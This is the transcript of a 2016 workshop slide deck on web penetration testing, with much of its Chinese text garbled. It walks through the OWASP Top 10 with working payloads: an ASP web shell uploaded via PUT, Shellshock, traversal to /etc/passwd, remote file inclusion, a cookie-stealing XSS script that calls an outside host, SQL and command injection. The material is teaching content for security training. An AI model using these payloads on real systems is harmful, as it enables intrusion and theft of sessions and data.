Upgrade to Pro
— share decks privately, control downloads, hide ads and more …
Speaker Deck
Features
Speaker Deck
PRO
Sign in
Sign up for free
Search
Search
Web滲透技巧(上)
Search
Lionbug
October 01, 2016
Research
1
360
Web滲透技巧(上)
The Declaration of Hacker (TDOH) WorkShop
Lionbug
October 01, 2016
Tweet
Share
More Decks by Lionbug
See All by Lionbug
Privacy and Security
lionbug
0
210
Web滲透技巧(下)
lionbug
0
660
Other Decks in Research
See All in Research
論文紹介 DISN: Deep Implicit Surface Network for High quality Single-view 3D Reconstruction / DISN: Deep Implicit Surface Network for High quality Single-view 3D Reconstruction
nttcom
0
130
[2023 CCSE] ZOZOTOWN検索における 研究開発の取り組みについて
tomoyayama
0
130
方策の長期性能に対する効率的なオフライン評価・学習 (Long-term Off-Policy Evaluation and Learning)
usaito
PRO
2
210
HP (Hitto Point: 筆頭ポイント)
tanichu
0
760
20240127_熊本から今いちど真面目に都市交通~めざせ「車1割削減、渋滞半減、公共交通2倍」~ 全国路面電車サミット2024宇都宮
trafficbrain
1
680
20240209 データを肴に熊本の交通を考える会「車1割削減、渋滞半減、公共交通2倍」をめざし世界に学ぼう
trafficbrain
0
890
How to Perform Manual Classification for Deep Learning Using CloudCompare
kentaitakura
0
680
Prompt Tuning から Fine Tuning への移行時期推定
icoxfog417
17
7.1k
Weekly AI Agents News!
masatoto
13
3.9k
Webスケールデータセットに対する実用的なポイズニング手法 / Poisoning Web-Scale Training Datasets is Practical
nttcom
0
130
第14回対話システムシンポジウム EMNLP 2023 参加報告
atsumoto
0
160
Threat Intelligence and Beyond
rishikadesai_7
0
170
Featured
See All Featured
Pencils Down: Stop Designing & Start Developing
hursman
117
11k
Building Better People: How to give real-time feedback that sticks.
wjessup
356
18k
How to Ace a Technical Interview
jacobian
273
22k
VelocityConf: Rendering Performance Case Studies
addyosmani
321
23k
4 Signs Your Business is Dying
shpigford
176
21k
Web development in the modern age
philhawksworth
203
10k
I Don’t Have Time: Getting Over the Fear to Launch Your Podcast
jcasabona
22
1.6k
Writing Fast Ruby
sferik
622
60k
How to name files
jennybc
65
93k
Intergalactic Javascript Robots from Outer Space
tanoku
266
26k
Design and Strategy: How to Deal with People Who Don’t "Get" Design
morganepeng
117
18k
Building Adaptive Systems
keathley
32
1.9k
Transcript
Web佒蝚ದૣ(Ӥ) 2016/10/01 @ TDOH WorkShop LionBug
About Me • 讙紣Ռ̴a.k.a̴LionBug • 褾ੜ of TDOH • Co-founder
of UCCU • Know a little • Web Security
HTTP Hypertext Transfer Protocol
HTTPS Hypertext Transfer Protocol Secure
螀֢ܻቘ
Request & Response
HTTP Request GET /index.php HTTP/1.1 Host: lionbug.tw User-Agent: Mozilla/5.0 (Windows
NT 10.0; WOW64; Trident/7.0; rv:11.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive
Netcat or Telnet
Burp Suite
HTTP Request
HTTP GET Request GET /index.php HTTP/1.1 Host: lionbug.tw User-Agent: Mozilla/5.0
(Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive
HTTP POST Request POST /login.php HTTP/1.1 … Content-Type: application/x-www-form-urlencoded Content-Length:
29 <Enter> username=admin&password=admin
HTTP Method • GET • POST • HEAD • OPTIONS
PUT DELETE TRACE MOVE…
HTTP OPTIONS Request OPTIONS / HTTP/1.1 HOST: lionbug.tw
HTTP OPTIONS Request SUCCESS HTTP/1.1 200 OK Allow: OPTIONS, TRACE,
GET, HEAD, POST Server: Microsoft-IIS/7.5 Public: OPTIONS, TRACE, GET, HEAD, POST X-Powered-By: ASP.NET
HTTP OPTIONS Request Failed HTTP/1.1 200 OK Date: Thu, 29
Sep 2016 07:43:10 GMT Server: Apache
HTTP PUT Request PUT /shell.asp HTTP/1.1 HOST: lionbug.tw Content-Length: 26
<%eval(request(“cmd”))%>
HTTP PUT Request SUCCESS HTTP/1.1 201 Created Server: Microsoft-IIS/6.0 X-Powered-By:
ASP.NET Location: http://lionbug.tw/shell.asp
HTTP PUT Request Failed HTTP/1.1 404 Not Found
HTTP MOVE Request MOVE /shell.txt HTTP/1.1 HOST: lionbug.tw Destination: http://lionbug.tw/shell.asp
HTTP MOVE Request SUCCESS HTTP/1.1 201 Created Server: Microsoft-IIS/6.0 X-Powered-By:
ASP.NET Location: http://lionbug.tw/shell.asp
HTTP MOVE Request Failed HTTP/1.1 401 Unauthorized
WebDAV • MOVE shell.asp;.jpg • COPY shell.asp%00.jpg • NTFS稗褖 •
Ӿࢵኪמ礓羬ᕹWebDav笙၏膌 getshell
HTTP TRACE Request TRACE /hello HTTP/1.1 HOST: lionbug.tw Lion: bug
HTTP TRACE Request SUCCESS HTTP/1.1 200 OK … TRACE /hello
HTTP/1.1 HOST: lionbug.tw Lion: bug
XST Cross-Site Tracing
HTTP TRACE Request TRACE /<script>alert(1);<script> HTTP/1.1 HOST: lionbug.tw
HTTP TRACE Request SUCCESS HTTP/1.1 200 OK … TRACE /<script>alert(1);<script>
HTTP/1.1 HOST: lionbug.tw
HTTP TRACE Request • XST • Bypass httpOnly?
Try Bypass http://ctf.mis.nkfust.edu.tw/bypass01/
HTTP Request URI GET /index.php HTTP/1.1 Host: lionbug.tw User-Agent: Mozilla/5.0
(Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive
HTTP Request URI • /index.php • /upload/ • /blog/1 •
/index.php/blog/1 • ../../../../../etc/passwd
Django Directory Traversal
Try Bypass http://ctf.mis.nkfust.edu.tw/bypass02/
HTTP Request Version GET /index.php HTTP/1.1 Host: lionbug.tw User-Agent: Mozilla/5.0
(Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive
HTTP Request Version • ଉ憎粚 • 1.0 • 1.1 •
Host • Connection: Keep-Alive • 2.0 • HTTP2.0ܐᦓᤩ฿4ӻṛܧ笙၏牧 ݢ膌๐ۓ瑊ૄმ(Freebuf)
HTTP Request Header GET /index.php HTTP/1.1 Host: lionbug.tw User-Agent: Mozilla/5.0
(Windows NT 10.0; WOW64; Trident/7.0; rv:11.0) Accept: text/html,application/xhtml+xml,application/xml;q=0.9 Accept-Language: zh-TW,zh;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Connection: keep-alive
Requests HOST • Host: lionbug.tw • HTTP 1.1 • VirtualHost
• …
Try Bypass http://ctf.mis.nkfust.edu.tw/bypass03/
Requests User-Agent • User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; Trident/7.0;
rv:11.0) • 战ग़翕ᒊ螡䢔珊匍獉 • Shellshock (bash CVE-2014-6271) • () { :; }; ping -c 5 lionbug.tw • …
Requests Referer • Referer: http://lionbug.tw/index.php • …
Requests Accept 疑碢 • Accept: text/html; • Accept-Language: zh-TW,zh; •
Accept-Encoding: gzip, deflate • Accept-Ranges: bytes=0-1 • …
Requests Accept-Language • Accept-Language: zh-TW,zh; • …
Requests Accept-Ranges • Accept-Ranges: bytes=0-500 • Accept-Ranges: bytes=0-500,50-100 • CVE-2011-3192,
CVE-2015-1635(MS15-034) • …
Requests Cookie • Cookie: PHPSESSID=sess_3dd484f2bab6a2d 2509e9850dae3b897; • …
Requests X-Forwarded-For • X-Forwarded-For: 127.0.0.1 • …
HTTP Response
HTTP Status Code HTTP/1.1 200 OK Date: Wed, 25 May
2016 11:48:22 GMT Server: Apache Content-Length: 72 Connection: close Content-Type: text/html
HTTP Status Code • 1xx ૪ᤩ矑ݑ牧襑ᥝ媣媲蒂ቘ • 2xx ૪౮ۑᤩ֑๐瑊矑硩牏ቘ薹牏㪔矑ݑ •
3xx 制眲嘨አ㬵᯿碝疩ݻ牧盅媲ጱ藶穩֖࣎ • 4xx դ蔭ԧአ䜛ᒒ፡蚏㬵ݢ胼咳ኞԧ梊藮牧ঘ繸 ԧ֑๐瑊ጱ蒂ቘ • 5xx ֑๐瑊ࣁ蒂ቘ藶穩ጱ螂纷Ӿ磪梊藮ᘏ吖ଉ 制眲咳ኞ
HTTP Status Code • 200 OK • 3xx • 301
Moved Permanently • 302 Found • 4xx • 401 Unauthorized • 403 Forbidden • 500 Internal Server Error
HTTP Response Header HTTP/1.1 200 OK Date: Wed, 25 May
2016 11:48:22 GMT Server: Apache Content-Length: 72 Connection: close Content-Type: text/html
Response Server • Server: Apache/2.4.7 (Ubuntu) • Server: Microsoft-IIS/7.5 •
…
Response X-Powered-By • X-Powered-By: Flask/0.7.2 • X-Powered-By: ASP.NET • X-Powered-By:
PHP/5.5.9-1ubuntu4.19 • …
HTTP Response Content HTTP/1.1 200 OK … <html> </html>
Try to find http://ctf.mis.nkfust.edu.tw/bypass05/
OWASP TOP 10 2013 ᤩ拻粋ጱ聲
๚涢挨ጱ疩ݻ • A10 - Unvalidated Redirects and Forwards • https://google.com/?redirect=http://lionbug.tw/
• https://google.com/?redirect=http%3A%2f %2flionbug.tw%2f
Unvalidated Redirects and Forwards https://bounty.github.com/classifications/ unvalidated-redirect-or-forward.html
ֵአ૪Ꭳ笙၏زկ • A9 - Using Components with Known Vulnerabilities •
ଉ憎笙၏ॺկ • FCKeditor, CKeditor • WordPress or Plugin • WPScan
ᒊٛݷ藶穩 • A8 – Cross Site Request Forgery (CSRF) •
藶穩ےӤtoken • 蝐抓牫᯿ᗝੂ嘨牫 • <img src=“http://lionbug.tw/newpass?pass=123”>
耬ۑ胼羷獨ጱਂ玲矒ګ • A7 – Missing Function Level Access Control •
/admin/upload.php • .git .svn • index.php~ • robots.txt
robots.txt # robots.txt to deny the robots access User-agent: *
Disallow: /admin Disallow: /admin.ex Disallow: /config
robots.txt • fb.me/robots.txt • www.dcard.tw/robots.txt • tw.yahoo.com/robots.txt
硵眤虻碘ู襷 • A6 – Sensitive Data Exposure • ੂ嘨 •
MD5牏SHA1牏DES • ก嘨㯽蜍
ੂ嘨ਂࣁCookieӾ
LinkedIn 癱ੂ丽笙 http://thehackernews.com/2016/05/linkedin-account- hack.html
dadada http://www.nydailynews.com/news/national/mark-zuckerberg- twitter-account-hacked-password-dadada-article-1.2662351
౯ጱੂ嘨䷱磪ےੂ 褾仡
EC-Council
EC-Council ?????????
犋吚ጱਞ獊奲眲戔ਧ • A5 – Security Misconfiguration • ୧ੂ嘨? admin? root?
1234? • port • 3306 mysql • 6379 redis • 8081 tomcat • …
犋ਞ獊ጱᇔկ㷢ᘍ • A4 – Insecure Direct Object References • ଘᤈ稗褖
• /?stuid=u9823001 • /cgpwd.php?username=admin&pass=1234 • /delete.php?id=123
ଘᤈ稗褖笙၏ A ݶ䋊 B ݶ䋊 C ݶ䋊 D ݶ䋊 Admin
Facebook Fixes Vulnerability That Led to Account Takeover, Pays Researcher
$16K https://threatpost.com/facebook-fixes-vulnerability-that- led-to-account-takeover-pays-researcher-16k/120688/
Security Researcher Discovers Bug That Would Let Hackers Delete Any
Photo Off Facebook https://techcrunch.com/2013/09/02/security-researcher-discovers- bug-that-would-let-hackers-delete-any-photo-off-facebook/
OpenFind Mail2000 犨᯿ᗝੂ嘨
狕硬㮆Ո虻碘 襑ᥝ戔ਧᒫԫמᓟ胼硩᯿ᗝמ
modify_id ??
౮ۑ᯿ᗝadminੂ嘨 https://zeroday.hitcon.org/vulnerability/ ZD-2016-00031
犋吚ጱਞ獊奲眲戔ਧ • Directory Traversal • /download.php?file=123.pdf • /download.php?file=../../../../../etc/passwd • Local
File Inclusion • /index.php?mod=news • <?php include($_GET[‘mod’].’php’); ?>
犋吚ጱਞ獊奲眲戔ਧ • Remote File Inclusion • /index.php?mod=http://lionbug.tw/shell.php allow_url_fopen=On
WhatsApp LFI http://thehackernews.com/2013/06/Hacking- whatsapp-android-application.html
ᒊ脻纷ୗ硭䢗 • A3 – Cross-Site Scripting(XSS) • 硭䢗ਮ䜛ᒒ牫 • ࣁ獮ᒒ矠獈䘣դ嘨
•HTML牏CSS牏Javascript牏Flash …
ᒊ脻纷ୗ硭䢗 • 玱疤ࣳ • http://lionbug.tw/xss.php? msg=<script>alert(1);</script> • 㱪ਂࣳ • ᒍ獉
• …
碝窚盏玡Ӟ賳Flash XSSکXSS Worm https://www.leavesongs.com/HTML/sina-weibo- flashxss-worm.html
XSS 猂玲 Cookie
ᒊ脻纷ୗ硭䢗 <script> var img = new Image(); img.src = ‘http://lionbug.tw/’+document.cookie;
</script>
OpenFind Mail2000 Xss
• onclick 磦矦౮ xonclick • script 磦矦౮ scrips • html
݄ᴻ ?? OpenFind Mail2000
<html></html><<html></html>s<html></ html>c<html></html>r<html></html>i<html></ html>p<html></html>t<html></ html>><html></html>a<html></html>l<html></ html>e<html></html>r<html></html>t<html></ html>(<html></html>'<html></html>x<html></ html>s<html></html>s<html></html>'<html></ html>)<html></html>;<html></html><<html></ html>/<html></html>s<html></html>c<html></ html>r<html></html>i<html></html>p<html></
html>t<html></html>> XSS Payload
OpenFind Mail2000 XSS
BeEF 吚㮆ૡٍՈ
XSS 犖胼盅ݣ
Try to find http://ctf.mis.nkfust.edu.tw/bypass06
०硳ጱ涢挨膏蝫娄ᓕቘ • A2 – Broken Authentication and Session Management •
Session and Cookie • Cookie • admin=0; • user=21232f297a57a5a743894a0e4a801fc3; • HMAC ?? • …
襷ॠ笙၏ http://www.inside.com.tw/2015/08/21/ruten-security- issue
ဳ獈硭䢗 • A1 – Injection • ဳ獈圵觊 • SQL Injection
• Code Injection • Command Injection • LDAP Injection • …
SQL Injection Select username, password From Member Where username =
‘admin’ and password = ‘1234’
user.php?id=1 SELECT id, name, password From member Where id =
1 id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe
user.php?id=1 or 1=1 SELECT id, name, password From member Where
id = 1 Or 1=1 id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe
Login SELECT … Where name = ‘admin’ AND password =
‘asdxcx’ id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe
Login SELECT … Where name = ‘admin’ or 1 =
1 -- ‘’ AND password = ‘’ id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe id name password 1 admin asdxcx 2 lin 5657 3 jhe 123 4 lionbug qwe
Code Injection • 纷ୗ嘨ဳ獈 • PHP • eval($_GET[‘code’]); • ASP
• <%eval request("code")%>
Uber Remote Code Execution http://blog.orange.tw/2016/04/bug-bounty-uber- ubercom-remote-code_7.html
Command Injection • 犤ဳ獈 • curl http://lionbug.tw • curl http://lionbug.tw;
ls -al
Google Command injection http://www.pranav-venkat.com/2016/03/command- injection-which-got-me-6000.html
伛猋ૡ֢ • 蘷獨承 礍 羬翄 (wappalyzer) • 矊ፓ袅 (dirb) •
㯏礚 • subDomainsBrute • … • …
ଉ憎笙၏ڥአ • 犨Ӥ㯽笙၏ • LFI • SQL injection • …
犨Ӥ㯽笙၏ • 涢挨ොୗ • JS • FileName • Content-Type •
Header
JS 獮ᒒ涢挨
犨Ӥ㯽笙၏ • FileName • 123.jpg • 123.php%00.jpg • 123.jpg.php •
123.php?.jpg
犨Ӥ㯽笙၏ • Content-Type • image/jpeg • image/png • Header •
??
PHP Bug?? http://ctf.mis.nkfust.edu.tw/bypass07
== TRUE FALSE 1 0 -1 "1" "0" "-1" NULL
array() "php" "" TRUE TRUE FALSE TRUE FALSE TRUE TRUE FALSE TRUE FALSE FALSE TRUE FALSE FALSE FALSE TRUE FALSE TRUE FALSE FALSE TRUE FALSE TRUE TRUE FALSE TRUE 1 TRUE FALSE TRUE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE 0 FALSE TRUE FALSE TRUE FALSE FALSE TRUE FALSE TRUE FALSE TRUE TRUE -1 TRUE FALSE FALSE FALSE TRUE FALSE FALSE TRUE FALSE FALSE FALSE FALSE "1" TRUE FALSE TRUE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE "0" FALSE TRUE FALSE TRUE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE "-1" TRUE FALSE FALSE FALSE TRUE FALSE FALSE TRUE FALSE FALSE FALSE FALSE NULL FALSE TRUE FALSE TRUE FALSE FALSE FALSE FALSE TRUE TRUE FALSE TRUE array() FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE TRUE TRUE FALSE FALSE "php" TRUE FALSE FALSE TRUE FALSE FALSE FALSE FALSE FALSE FALSE TRUE FALSE "" FALSE TRUE FALSE TRUE FALSE FALSE FALSE FALSE TRUE FALSE FALSE TRUE
Q & A